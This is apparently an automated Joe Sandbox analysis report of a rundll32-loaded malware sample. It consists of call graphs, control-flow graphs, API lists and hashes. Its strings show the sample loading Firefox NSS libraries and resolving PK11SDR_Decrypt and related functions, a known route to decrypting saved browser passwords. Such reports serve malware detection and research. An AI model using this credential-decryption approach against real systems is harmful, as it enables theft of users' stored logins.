103842->103851 103845 7ffd92c93d50 _Adl_verify_range 7 API calls 103843->103845 103846 7ffd92cad091 103845->103846 103847 7ffd92c93c20 _Adl_verify_range 3 API calls 103846->103847 103848 7ffd92cad0a3 _Adl_verify_range 103847->103848 103850 7ffd92cad080 std::_Container_base12::~_Container_base12 103848->103850 103852 7ffd92cc7960 10 API calls 2 library calls 103848->103852 103850->103713 103851->103850 103852->103850 103853 7ffd92c10a03 103858 7ffd92c10580 103853->103858 103855 7ffd92c10a11 103856 7ffd92c106d8 103855->103856 103857 7ffd92c93370 std::_Fiopen 55 API calls 103855->103857 103857->103856 103860 7ffd92c105bb 103858->103860 103859 7ffd92c105ca 103859->103855 103860->103859 103862 7ffd92c0fd10 103860->103862 103863 7ffd92c0fd35 103862->103863 103864 7ffd92c0fd3b 103862->103864 103863->103859 103864->103863 103866 7ffd92c9c190 103864->103866 103869 7ffd92c9c1e0 103866->103869 103868 7ffd92c9c1cd 103868->103863 103874 7ffd92c9c200 memcpy_s 103869->103874 103876 7ffd92c9c208 103869->103876 103870 7ffd92c91b90 Concurrency::details::ContextBase::GetWorkQueueIdentity EnterCriticalSection 103871 7ffd92c9c2ec 103870->103871 103877 7ffd92c9b7e0 103871->103877 103873 7ffd92c9c310 103881 7ffd92c91bd0 LeaveCriticalSection Concurrency::details::ContextBase::GetWorkQueueIdentity Concurrency::details::_Scheduler::_Scheduler 103873->103881 103874->103870 103874->103876 103876->103868 103878 7ffd92c9b80d Concurrency::details::ContextBase::GetWorkQueueIdentity _fread_nolock Concurrency::details::_Scheduler::_Scheduler __crt_scoped_stack_ptr memcpy_s 103877->103878 103879 7ffd92c9b823 Concurrency::details::ContextBase::GetWorkQueueIdentity __create_locale 103878->103879 103880 7ffd92cc5410 _fread_nolock 2 API calls 103878->103880 103879->103873 103880->103878 103881->103876 103882 7ffd92c0ce04 103883 7ffd92c0ce11 103882->103883 103884 7ffd92c0ce15 103882->103884 103884->103883 103885 7ffd92c9cae0 std::_Fiopen 51 API calls 103884->103885 103886 7ffd92c0ce30 103885->103886 103886->103883 103887 7ffd92c93370 std::_Fiopen 55 API calls 103886->103887 103887->103883 103888 7ffd92cb0840 103891 7ffd92caf1e0 103888->103891 103895 7ffd92caf218 std::_Fac_node::_Fac_node 103891->103895 103892 7ffd92c08950 _except1 8 API calls 103893 7ffd92caf502 103892->103893 103894 7ffd92caf27a _dosmaperr 103894->103892 103895->103894 103897 7ffd92caf180 103895->103897 103898 7ffd92caf1a5 GetLocaleNameFromLanguage 103897->103898 103901 7ffd92caf130 103898->103901 103908 7ffd92cafec0 103901->103908 103907 7ffd92caf173 103907->103894 103918 7ffd92cc3a10 EnterCriticalSection 103908->103918 103910 7ffd92caf15a 103911 7ffd92cafee0 103910->103911 103912 7ffd92caff8f 103911->103912 103914 7ffd92caff3a 103911->103914 103919 7ffd92cafa20 GetFileType 103912->103919 103915 7ffd92c08950 _except1 8 API calls 103914->103915 103916 7ffd92caf165 103915->103916 103917 7ffd92cb0050 LeaveCriticalSection _wsopen_s 103916->103917 103917->103907 103918->103910 103920 7ffd92cafa67 103919->103920 103921 7ffd92cafa6c 103919->103921 103923 7ffd92cafbbe GetFileInformationByHandle 103920->103923 103954 7ffd92cb0300 10 API calls 4 library calls 103920->103954 103922 7ffd92cafa7e 103921->103922 103924 7ffd92cafb2a 103921->103924 103930 7ffd92cafae3 PeekNamedPipe 103922->103930 103931 7ffd92cafb10 _dosmaperr __create_locale 103922->103931 103925 7ffd92cafbe6 GetLastError 103923->103925 103926 7ffd92cafbfa 103923->103926 103927 7ffd92cafb45 GetLastError 103924->103927 103924->103931 103925->103931 103941 7ffd92cb0200 103926->103941 103927->103931 103929 7ffd92cafb8f 103929->103923 103929->103931 103930->103931 103934 7ffd92c08950 _except1 8 API calls 103931->103934 103936 7ffd92cafca6 103934->103936 103936->103914 103938 7ffd92cafcb0 __create_locale 46 API calls 103939 7ffd92cafc45 103938->103939 103940 7ffd92cafcb0 __create_locale 46 API calls 103939->103940 103940->103931 103942 7ffd92cb0225 __create_locale 103941->103942 103955 7ffd92cb03b0 103942->103955 103945 7ffd92cafcb0 103946 7ffd92cafcd7 103945->103946 103947 7ffd92cafceb FileTimeToSystemTime 103945->103947 103946->103947 103948 7ffd92cafce1 103946->103948 103947->103948 103949 7ffd92cafd02 SystemTimeToTzSpecificLocalTime 103947->103949 103952 7ffd92c08950 _except1 8 API calls 103948->103952 103949->103948 103950 7ffd92cafd21 103949->103950 103970 7ffd92cafd80 103950->103970 103953 7ffd92cafc23 103952->103953 103953->103938 103954->103929 103956 7ffd92cafc0b 103955->103956 103957 7ffd92cb03c5 wcsrchr 103955->103957 103956->103945 103957->103956 103965 7ffd92c921a0 103957->103965 103959 7ffd92cb03f5 103959->103956 103960 7ffd92c921a0 TranslateName 8 API calls 103959->103960 103961 7ffd92cb040a 103960->103961 103961->103956 103962 7ffd92c921a0 TranslateName 8 API calls 103961->103962 103963 7ffd92cb041f 103962->103963 103963->103956 103964 7ffd92c921a0 TranslateName 8 API calls 103963->103964 103964->103956 103966 7ffd92c921b3 __crtCompareStringA 103965->103966 103968 7ffd92c921be TranslateName 103966->103968 103969 7ffd92c92340 8 API calls 2 library calls 103966->103969 103968->103959 103969->103968 103973 7ffd92cdccf0 103970->103973 103976 7ffd92cdc8b0 103973->103976 103979 7ffd92cdc908 103976->103979 103980 7ffd92cdc8f8 _isindst __create_locale 103976->103980 103977 7ffd92c08950 _except1 8 API calls 103978 7ffd92cafdff 103977->103978 103978->103948 103979->103977 103980->103979 103990 7ffd92cc9360 103980->103990 103982 7ffd92cdcad9 _isindst 103983 7ffd92c91110 _invoke_watson_if_error 17 API calls 103982->103983 103984 7ffd92cdcb28 _isindst 103983->103984 103985 7ffd92c91110 _invoke_watson_if_error 17 API calls 103984->103985 103986 7ffd92cdcb5f __create_locale 103985->103986 103987 7ffd92c91110 _invoke_watson_if_error 17 API calls 103986->103987 103988 7ffd92cdcb96 103987->103988 103988->103979 103998 7ffd92cc93d0 19 API calls 2 library calls 103988->103998 103992 7ffd92cc9370 _get_purecall_handler __scrt_file_policy::set_commode std::_Container_base12::~_Container_base12 103990->103992 103991 7ffd92cc9396 103991->103982 103992->103991 103993 7ffd92ca4710 __vcrt_lock EnterCriticalSection 103992->103993 103994 7ffd92cc93a2 _get_purecall_handler 103993->103994 103995 7ffd92cc91e0 __create_locale 44 API calls 103994->103995 103996 7ffd92cc93b1 103994->103996 103995->103996 103997 7ffd92ca47a0 __vcrt_lock LeaveCriticalSection 103996->103997 103997->103991 103998->103979 103999 7ffd92bff291 104000 7ffd92bff29a 103999->104000 104001 7ffd92bff359 103999->104001 104006 7ffd92bff060 8 API calls _except1 104000->104006 104003 7ffd92bff2ab 104007 7ffd92c03e70 55 API calls 4 library calls 104003->104007 104005 7ffd92bff2c9 104006->104003 104007->104005 104008 7ffd92c95204 104009 7ffd92c95221 _wtempnam 104008->104009 104012 7ffd92c9522c memcpy_s _wtempnam 104009->104012 104017 7ffd92c96d80 104009->104017 104011 7ffd92c95341 strrchr _wtempnam 104013 7ffd92c956ff memcpy_s 104011->104013 104015 7ffd92c95780 memcpy_s 104011->104015 104014 7ffd92cc4420 _wtempnam 2 API calls 104013->104014 104014->104012 104015->104012 104021 7ffd92cc4420 104015->104021 104018 7ffd92c96d95 _wtempnam 104017->104018 104019 7ffd92c96d91 104017->104019 104020 7ffd92c96d9f HeapValidate 104018->104020 104019->104011 104020->104019 104022 7ffd92cc4433 _wtempnam 104021->104022 104023 7ffd92cc4431 _dosmaperr 104021->104023 104024 7ffd92cc443d RtlRestoreThreadPreferredUILanguages 104022->104024 104023->104012 104024->104023 104025 7ffd92cc4451 GetLastError 104024->104025 104025->104023

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 148 7ffd92c0b230-7ffd92c0b292 call 7ffd92c0aba0 call 7ffd92c0acd0 call 7ffd92c0ad00 155 7ffd92c0b294-7ffd92c0b2aa call 7ffd92c0aba0 148->155 156 7ffd92c0b2b6-7ffd92c0b2cc call 7ffd92c0aba0 148->156 155->156 161 7ffd92c0b2ac-7ffd92c0b2b1 155->161 162 7ffd92c0b2ce-7ffd92c0b2d6 156->162 163 7ffd92c0b324-7ffd92c0b32c 156->163 166 7ffd92c0b7a2-7ffd92c0b7b9 call 7ffd92c08950 161->166 162->163 167 7ffd92c0b2d8-7ffd92c0b2ee call 7ffd92c01e70 162->167 164 7ffd92c0b32e-7ffd92c0b330 163->164 165 7ffd92c0b335-7ffd92c0b356 call 7ffd92c0aba0 163->165 164->166 174 7ffd92c0b4c6-7ffd92c0b4ce 165->174 175 7ffd92c0b35c-7ffd92c0b364 165->175 176 7ffd92c0b2f0-7ffd92c0b2f7 167->176 177 7ffd92c0b2f9-7ffd92c0b321 call 7ffd92c0acd0 call 7ffd92c0ad00 167->177 181 7ffd92c0b4d0-7ffd92c0b4d2 174->181 182 7ffd92c0b4d7-7ffd92c0b4de 174->182 178 7ffd92c0b366-7ffd92c0b37c call 7ffd92c01e70 175->178 179 7ffd92c0b38b-7ffd92c0b3a5 GetFileAttributesExW 175->179 176->163 176->177 177->163 178->179 202 7ffd92c0b37e-7ffd92c0b385 178->202 186 7ffd92c0b438-7ffd92c0b44a 179->186 187 7ffd92c0b3ab-7ffd92c0b3ba GetLastError 179->187 181->166 183 7ffd92c0b4e0-7ffd92c0b4e8 182->183 184 7ffd92c0b4ea-7ffd92c0b4f9 call 7ffd92c0ace0 182->184 189 7ffd92c0b4fd-7ffd92c0b531 call 7ffd92c0ac00 183->189 184->189 191 7ffd92c0b461-7ffd92c0b4c1 call 7ffd92c0ad40 * 2 call 7ffd92c0acd0 call 7ffd92c0ad00 186->191 192 7ffd92c0b44c-7ffd92c0b45f call 7ffd92c01e70 186->192 194 7ffd92c0b3c5-7ffd92c0b3e6 FindFirstFileW 187->194 195 7ffd92c0b3bc-7ffd92c0b3c0 187->195 208 7ffd92c0b54e-7ffd92c0b594 call 7ffd92bec1e0 call 7ffd92c0aba0 189->208 209 7ffd92c0b533-7ffd92c0b549 call 7ffd92c0ac70 189->209 191->174 192->174 192->191 203 7ffd92c0b3f3-7ffd92c0b430 FindClose 194->203 204 7ffd92c0b3e8-7ffd92c0b3ee GetLastError 194->204 195->166 202->174 202->179 203->186 204->166 221 7ffd92c0b59a-7ffd92c0b5bf call 7ffd92c0ad30 GetFileInformationByHandleEx 208->221 222 7ffd92c0b6cb-7ffd92c0b6e1 call 7ffd92c0aba0 208->222 209->166 227 7ffd92c0b5de-7ffd92c0b632 call 7ffd92c0acd0 call 7ffd92c0ad00 call 7ffd92c0aba0 221->227 228 7ffd92c0b5c1-7ffd92c0b5d9 GetLastError call 7ffd92c0ac70 221->228 229 7ffd92c0b6e7-7ffd92c0b70f call 7ffd92c0ad30 GetFileInformationByHandleEx 222->229 230 7ffd92c0b76a-7ffd92c0b772 222->230 227->222 254 7ffd92c0b638-7ffd92c0b646 227->254 228->166 244 7ffd92c0b711-7ffd92c0b729 GetLastError call 7ffd92c0ac70 229->244 245 7ffd92c0b72b-7ffd92c0b765 call 7ffd92c0acd0 call 7ffd92c0ad00 229->245 233 7ffd92c0b774-7ffd92c0b78a call 7ffd92c0ac70 230->233 234 7ffd92c0b78c-7ffd92c0b79e call 7ffd92c0ac70 230->234 233->166 234->166 244->166 245->230 255 7ffd92c0b6a3-7ffd92c0b6ab 254->255 256 7ffd92c0b648-7ffd92c0b670 call 7ffd92c0ad30 GetFileInformationByHandleEx 254->256 257 7ffd92c0b6b2-7ffd92c0b6c6 call 7ffd92c0acd0 call 7ffd92c0ad00 255->257 261 7ffd92c0b68f-7ffd92c0b6a1 256->261 262 7ffd92c0b672-7ffd92c0b68a GetLastError call 7ffd92c0ac70 256->262 257->222 261->257 262->166
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.5554047154.00007FFD92BE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFD92BE0000, based on PE: true
                                • Associated: 00000010.00000002.5554028318.00007FFD92BE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000010.00000002.5554162005.00007FFD92D2A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000010.00000002.5554180701.00007FFD92D2F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd92be0000_rundll32.jbxd
                                Similarity
                                • API ID: Bitmask_includes$operator&=$AttributesErrorFileLast
                                • String ID: $"$*$2
                                • API String ID: 2933814485-1448646367
                                • Opcode ID: fad48dce896e47e351054fd65ca9c6500c24d0a3827aa1398ac1be6e81e8deb8
                                • Instruction ID: ac259317ea2eefae4bdf84bbacae8e84e0d1e55972b4faa240a8ff64ccb23361
                                • Opcode Fuzzy Hash: fad48dce896e47e351054fd65ca9c6500c24d0a3827aa1398ac1be6e81e8deb8
                                • Instruction Fuzzy Hash: 88E11A3274C68287FB74DBA5E4603AEB3B0EBC4741F104035E68E87A99DE7CE9458B40

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 533 7ffd92bf5730-7ffd92bf57c1 call 7ffd92c08cf0 call 7ffd92bef3d0 call 7ffd92beeaa0 540 7ffd92bf57c7-7ffd92bf57dc 533->540 541 7ffd92bf5efe-7ffd92bf5f0f call 7ffd92be96b0 533->541 542 7ffd92bf5f7c-7ffd92bf5f81 call 7ffd92be9fe0 540->542 543 7ffd92bf57e2-7ffd92bf5845 call 7ffd92c08cf0 540->543 550 7ffd92bf5f21-7ffd92bf5f75 call 7ffd92c08cb0 call 7ffd92c08950 541->550 551 7ffd92bf5f11-7ffd92bf5f1c call 7ffd92be99c0 541->551 552 7ffd92bf5f82-7ffd92bf5f87 call 7ffd92be9fe0 542->552 553 7ffd92bf587a-7ffd92bf58d8 call 7ffd92ce6400 call 7ffd92bf5160 call 7ffd92be96b0 543->553 554 7ffd92bf5847-7ffd92bf585b 543->554 551->550 573 7ffd92bf58ec-7ffd92bf597a call 7ffd92c08cb0 call 7ffd92bf09b0 call 7ffd92bf4bc0 call 7ffd92bf3b30 553->573 574 7ffd92bf58da-7ffd92bf58e7 call 7ffd92be99c0 553->574 559 7ffd92bf5862-7ffd92bf5865 554->559 560 7ffd92bf585d-7ffd92bf5860 554->560 565 7ffd92bf5869-7ffd92bf5875 call 7ffd92c07e50 559->565 560->565 565->553 573->552 584 7ffd92bf5980-7ffd92bf59b2 call 7ffd92c08cf0 573->584 574->573 587 7ffd92bf59b4-7ffd92bf59cc 584->587 588 7ffd92bf59ce-7ffd92bf59d8 584->588 589 7ffd92bf5a19-7ffd92bf5a5e SetCurrentDirectoryA LoadLibraryA 587->589 590 7ffd92bf59da-7ffd92bf59dd 588->590 591 7ffd92bf59df-7ffd92bf59e8 588->591 592 7ffd92bf5a74-7ffd92bf5a87 call 7ffd92be96b0 589->592 593 7ffd92bf5a60-7ffd92bf5a6f GetLastError call 7ffd92be9550 589->593 594 7ffd92bf59ec-7ffd92bf5a14 call 7ffd92c07e50 call 7ffd92ce6400 590->594 591->594 600 7ffd92bf5a9b-7ffd92bf5ac5 call 7ffd92c08cb0 592->600 601 7ffd92bf5a89-7ffd92bf5a96 call 7ffd92be99c0 592->601 593->592 594->589 607 7ffd92bf5ada-7ffd92bf5b82 GetProcAddress * 7 600->607 608 7ffd92bf5ac7-7ffd92bf5ad5 call 7ffd92c02020 600->608 601->600 610 7ffd92bf5b88-7ffd92bf5be8 call 7ffd92c08cf0 607->610 611 7ffd92bf5f76-7ffd92bf5f7b call 7ffd92be9fe0 607->611 608->607 616 7ffd92bf5bea-7ffd92bf5bfe 610->616 617 7ffd92bf5c23-7ffd92bf5c72 call 7ffd92ce6400 610->617 611->542 618 7ffd92bf5c05-7ffd92bf5c0e 616->618 619 7ffd92bf5c00-7ffd92bf5c03 616->619 626 7ffd92bf5d9c-7ffd92bf5dae call 7ffd92be96b0 617->626 627 7ffd92bf5c78-7ffd92bf5c7c 617->627 621 7ffd92bf5c12-7ffd92bf5c1e call 7ffd92c07e50 618->621 619->621 621->617 634 7ffd92bf5dc2-7ffd92bf5e03 call 7ffd92c08cb0 call 7ffd92bf3c00 call 7ffd92be96b0 626->634 635 7ffd92bf5db0-7ffd92bf5dbd call 7ffd92be99c0 626->635 629 7ffd92bf5c80-7ffd92bf5c8b 627->629 631 7ffd92bf5ca7-7ffd92bf5ccc call 7ffd92bfcbd0 call 7ffd92be9720 call 7ffd92c08820 629->631 632 7ffd92bf5c8d-7ffd92bf5c95 629->632 650 7ffd92bf5cd0-7ffd92bf5cd8 631->650 636 7ffd92bf5c9a-7ffd92bf5ca2 call 7ffd92bffa20 632->636 637 7ffd92bf5c97 632->637 653 7ffd92bf5e05-7ffd92bf5e0c 634->653 654 7ffd92bf5e5e-7ffd92bf5e82 call 7ffd92c08cb0 call 7ffd92be96b0 634->654 635->634 636->631 637->636 650->650 652 7ffd92bf5cda-7ffd92bf5d0b call 7ffd92bffa20 call 7ffd92bfcbd0 call 7ffd92be9720 call 7ffd92c08820 650->652 682 7ffd92bf5d10-7ffd92bf5d18 652->682 657 7ffd92bf5e25-7ffd92bf5e5a call 7ffd92c006a0 653->657 658 7ffd92bf5e0e 653->658 671 7ffd92bf5e94-7ffd92bf5ec9 call 7ffd92c08cb0 call 7ffd92be96b0 654->671 672 7ffd92bf5e84-7ffd92bf5e8f call 7ffd92be99c0 654->672 657->654 659 7ffd92bf5e10-7ffd92bf5e1f call 7ffd92bf3c00 658->659 670 7ffd92bf5e21 659->670 670->657 683 7ffd92bf5edb-7ffd92bf5efd call 7ffd92c08cb0 671->683 684 7ffd92bf5ecb-7ffd92bf5ed6 call 7ffd92be99c0 671->684 672->671 682->682 685 7ffd92bf5d1a-7ffd92bf5d31 call 7ffd92bffa20 682->685 683->541 684->683 691 7ffd92bf5d7c-7ffd92bf5d86 call 7ffd92c06920 685->691 692 7ffd92bf5d33-7ffd92bf5d7a call 7ffd92bfcbd0 * 3 call 7ffd92bff710 685->692 695 7ffd92bf5d8b-7ffd92bf5d96 691->695 692->695 695->626 695->629
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.5554047154.00007FFD92BE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFD92BE0000, based on PE: true
                                • Associated: 00000010.00000002.5554028318.00007FFD92BE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000010.00000002.5554162005.00007FFD92D2A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000010.00000002.5554180701.00007FFD92D2F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd92be0000_rundll32.jbxd
                                Similarity
                                • API ID: AddressProcdelete$Concurrency::cancel_current_task$CurrentDirectoryErrorLastLibraryLoad_heap_alloc
                                • String ID: Library couldnt loaded!.. %d$Load library failse!$NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$PL_Base64Decode$\..
                                • API String ID: 82395560-3640394235
                                • Opcode ID: 2bcdbe3b748dbd75fb854b818cdc2ef14c15132eb5b049c7bec928868ad73d2f
                                • Instruction ID: 7fee6b42c0799b22a422e9a90542c9ce208aab564a7cd0364cd8a16876b11725
                                • Opcode Fuzzy Hash: 2bcdbe3b748dbd75fb854b818cdc2ef14c15132eb5b049c7bec928868ad73d2f
                                • Instruction Fuzzy Hash: 88327F22B08B8185FB20DFA0E8A01EE77B1FB44759F145235EA9D17A9ADFBCD584C740

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2255 7ffd92c291b0-7ffd92c291cc 2256 7ffd92c291ce-7ffd92c291e0 WSAStartup 2255->2256 2257 7ffd92c29216-7ffd92c2921d call 7ffd92c59d90 2255->2257 2258 7ffd92c291e2-7ffd92c291e9 2256->2258 2259 7ffd92c291f9-7ffd92c29215 call 7ffd92c08950 2256->2259 2265 7ffd92c29420-7ffd92c29437 call 7ffd92c08950 2257->2265 2266 7ffd92c29223-7ffd92c29248 GetModuleHandleA 2257->2266 2261 7ffd92c291f3 WSACleanup 2258->2261 2262 7ffd92c291eb-7ffd92c291f1 2258->2262 2261->2259 2262->2257 2262->2261 2268 7ffd92c29256-7ffd92c29292 GetProcAddress call 7ffd92cb3b40 2266->2268 2269 7ffd92c2924a-7ffd92c29251 2266->2269 2276 7ffd92c29294-7ffd92c2929a 2268->2276 2277 7ffd92c292ba-7ffd92c292bd 2268->2277 2271 7ffd92c293dd-7ffd92c29418 call 7ffd92c59940 QueryPerformanceFrequency 2269->2271 2271->2265 2279 7ffd92c292ac-7ffd92c292b5 LoadLibraryA 2276->2279 2280 7ffd92c2929c-7ffd92c292a7 2276->2280 2281 7ffd92c292bf-7ffd92c292d2 GetProcAddress 2277->2281 2282 7ffd92c292e9-7ffd92c29300 GetSystemDirectoryA 2277->2282 2285 7ffd92c2939c-7ffd92c293b6 2279->2285 2280->2285 2281->2282 2286 7ffd92c292d4-7ffd92c292e4 2281->2286 2283 7ffd92c29394 2282->2283 2284 7ffd92c29306-7ffd92c29319 2282->2284 2283->2285 2291 7ffd92c2938b 2284->2291 2292 7ffd92c2931b-7ffd92c29329 GetSystemDirectoryA 2284->2292 2285->2271 2287 7ffd92c293b8-7ffd92c293d6 GetProcAddress 2285->2287 2286->2285 2287->2271 2291->2283 2292->2291 2293 7ffd92c2932b-7ffd92c29332 2292->2293 2294 7ffd92c29335-7ffd92c2933e 2293->2294 2294->2294 2295 7ffd92c29340-7ffd92c29349 2294->2295 2296 7ffd92c29350-7ffd92c29357 2295->2296 2296->2296 2297 7ffd92c29359-7ffd92c2935f 2296->2297 2298 7ffd92c29362-7ffd92c2936e 2297->2298 2298->2298 2299 7ffd92c29370-7ffd92c29376 2298->2299 2300 7ffd92c29382 LoadLibraryA 2299->2300 2301 7ffd92c29378-7ffd92c29380 2299->2301 2302 7ffd92c29388 2300->2302 2301->2302 2302->2291
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.5554047154.00007FFD92BE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFD92BE0000, based on PE: true
                                • Associated: 00000010.00000002.5554028318.00007FFD92BE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000010.00000002.5554162005.00007FFD92D2A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000010.00000002.5554180701.00007FFD92D2F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd92be0000_rundll32.jbxd
                                Similarity
                                • API ID: AddressProc$DirectoryLibraryLoadSystem$CleanupFrequencyHandleModulePerformanceQueryStartup
                                • String ID: AddDllDirectory$LoadLibraryExA$if_nametoindex$iphlpapi.dll$kernel32
                                • API String ID: 795306257-2794540096
                                • Opcode ID: 3003b2d0f8eec47550ca270e86fcb0e17ab33abd67c11581925bf011729d4ff2
                                • Instruction ID: c2c92834594b69710204ee6e5fbc32f026b47aa36bebb25bbfdab9d1576a064e
                                • Opcode Fuzzy Hash: 3003b2d0f8eec47550ca270e86fcb0e17ab33abd67c11581925bf011729d4ff2
                                • Instruction Fuzzy Hash: 49618B25B0DB8285FB719B91E9643BD73A1BF88B92F584031C94E07799EFACE406C710

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2069 7ffd92c31450-7ffd92c31489 2070 7ffd92c3182f-7ffd92c31836 2069->2070 2071 7ffd92c3148f-7ffd92c31493 2069->2071 2074 7ffd92c3183e-7ffd92c3184d 2070->2074 2075 7ffd92c31838-7ffd92c3183c 2070->2075 2072 7ffd92c3164f-7ffd92c31656 2071->2072 2073 7ffd92c31499-7ffd92c3149d 2071->2073 2076 7ffd92c31658-7ffd92c3166f call 7ffd92c15950 2072->2076 2077 7ffd92c316b6-7ffd92c316c6 2072->2077 2073->2072 2080 7ffd92c314a3-7ffd92c314a7 2073->2080 2078 7ffd92c3184f-7ffd92c31856 2074->2078 2079 7ffd92c31893-7ffd92c318ab call 7ffd92c2b840 2074->2079 2075->2078 2100 7ffd92c31b94-7ffd92c31bb4 call 7ffd92c08950 2076->2100 2101 7ffd92c31675-7ffd92c3169f call 7ffd92c30ac0 2076->2101 2086 7ffd92c31703-7ffd92c3170d 2077->2086 2087 7ffd92c316c8-7ffd92c316cf 2077->2087 2078->2079 2082 7ffd92c31858-7ffd92c3185f 2078->2082 2107 7ffd92c318ad-7ffd92c318c2 call 7ffd92c15950 2079->2107 2108 7ffd92c318c8-7ffd92c318e0 call 7ffd92c2b840 2079->2108 2083 7ffd92c3150e-7ffd92c31515 2080->2083 2084 7ffd92c314a9-7ffd92c314be call 7ffd92c15950 2080->2084 2089 7ffd92c31861-7ffd92c31876 call 7ffd92c2b840 2082->2089 2090 7ffd92c31878-7ffd92c3188d call 7ffd92c15920 2082->2090 2096 7ffd92c3151d-7ffd92c3152c 2083->2096 2097 7ffd92c31517-7ffd92c3151b 2083->2097 2084->2100 2114 7ffd92c314c4-7ffd92c314ee call 7ffd92c30ac0 2084->2114 2091 7ffd92c3170f 2086->2091 2092 7ffd92c31733-7ffd92c3174b call 7ffd92c2b840 2086->2092 2087->2086 2095 7ffd92c316d1-7ffd92c316e6 call 7ffd92c2b840 2087->2095 2089->2079 2089->2090 2090->2079 2090->2100 2103 7ffd92c31710-7ffd92c31724 call 7ffd92c15920 2091->2103 2130 7ffd92c3174d-7ffd92c31778 call 7ffd92c30de0 2092->2130 2131 7ffd92c3177a-7ffd92c31782 2092->2131 2095->2086 2133 7ffd92c316e8-7ffd92c316fd call 7ffd92c15920 2095->2133 2098 7ffd92c3152e-7ffd92c31535 2096->2098 2099 7ffd92c31572-7ffd92c3158a call 7ffd92c2b840 2096->2099 2097->2098 2098->2099 2110 7ffd92c31537-7ffd92c3153e 2098->2110 2142 7ffd92c3158c-7ffd92c315b7 call 7ffd92c30de0 2099->2142 2143 7ffd92c315b9-7ffd92c315c3 2099->2143 2138 7ffd92c31501-7ffd92c31509 2101->2138 2139 7ffd92c316a5-7ffd92c316b1 call 7ffd92c26f90 2101->2139 2103->2100 2140 7ffd92c3172a-7ffd92c31731 2103->2140 2107->2100 2107->2108 2134 7ffd92c3190f-7ffd92c31917 2108->2134 2135 7ffd92c318e2-7ffd92c3190d call 7ffd92c30de0 2108->2135 2123 7ffd92c31540-7ffd92c31555 call 7ffd92c2b840 2110->2123 2124 7ffd92c31557-7ffd92c3156c call 7ffd92c15920 2110->2124 2114->2138 2149 7ffd92c314f0-7ffd92c314fc call 7ffd92c26f90 2114->2149 2123->2099 2123->2124 2124->2099 2124->2100 2152 7ffd92c317a3-7ffd92c317ba call 7ffd92c15950 2130->2152 2145 7ffd92c3178d-7ffd92c3179d call 7ffd92c343c0 2131->2145 2146 7ffd92c31784-7ffd92c3178b 2131->2146 2133->2086 2133->2100 2156 7ffd92c31922-7ffd92c31932 call 7ffd92c343c0 2134->2156 2157 7ffd92c31919-7ffd92c31920 2134->2157 2170 7ffd92c31938-7ffd92c31942 2135->2170 2151 7ffd92c31b81-7ffd92c31b8d call 7ffd92c2ca40 2138->2151 2178 7ffd92c31b92 2139->2178 2140->2092 2140->2103 2163 7ffd92c315e0-7ffd92c315f7 call 7ffd92c15950 2142->2163 2161 7ffd92c315c5-7ffd92c315c8 2143->2161 2162 7ffd92c315ca-7ffd92c315da call 7ffd92c343c0 2143->2162 2145->2100 2145->2152 2146->2152 2149->2178 2151->2178 2152->2100 2184 7ffd92c317c0-7ffd92c3180c call 7ffd92c35e70 call 7ffd92c30ac0 2152->2184 2156->2100 2156->2170 2157->2170 2161->2162 2161->2163 2162->2100 2162->2163 2163->2100 2188 7ffd92c315fd-7ffd92c31630 call 7ffd92c35e70 call 7ffd92c30ac0 2163->2188 2180 7ffd92c31ac4-7ffd92c31adb call 7ffd92c15950 2170->2180 2181 7ffd92c31948-7ffd92c31950 2170->2181 2178->2100 2180->2100 2192 7ffd92c31ae1-7ffd92c31ae8 2180->2192 2185 7ffd92c31a70-7ffd92c31aac call 7ffd92c35e70 2181->2185 2186 7ffd92c31956-7ffd92c3195d 2181->2186 2207 7ffd92c31811-7ffd92c31815 2184->2207 2201 7ffd92c31ab3-7ffd92c31abd call 7ffd92c15950 2185->2201 2186->2185 2191 7ffd92c31963-7ffd92c3196b 2186->2191 2214 7ffd92c31646-7ffd92c3164a 2188->2214 2220 7ffd92c31632-7ffd92c31641 call 7ffd92c26f90 2188->2220 2191->2185 2196 7ffd92c31971-7ffd92c31988 call 7ffd92c15950 2191->2196 2197 7ffd92c31b00-7ffd92c31b07 2192->2197 2198 7ffd92c31aea-7ffd92c31af1 2192->2198 2196->2100 2210 7ffd92c3198e-7ffd92c31995 2196->2210 2204 7ffd92c31b33-7ffd92c31b5a call 7ffd92c30ac0 2197->2204 2205 7ffd92c31b09-7ffd92c31b2a call 7ffd92c35e70 2197->2205 2198->2197 2203 7ffd92c31af3-7ffd92c31afe 2198->2203 2201->2204 2224 7ffd92c31abf 2201->2224 2203->2201 2230 7ffd92c31b6d 2204->2230 2231 7ffd92c31b5c-7ffd92c31b6b call 7ffd92c26f90 2204->2231 2205->2204 2228 7ffd92c31b2c-7ffd92c31b30 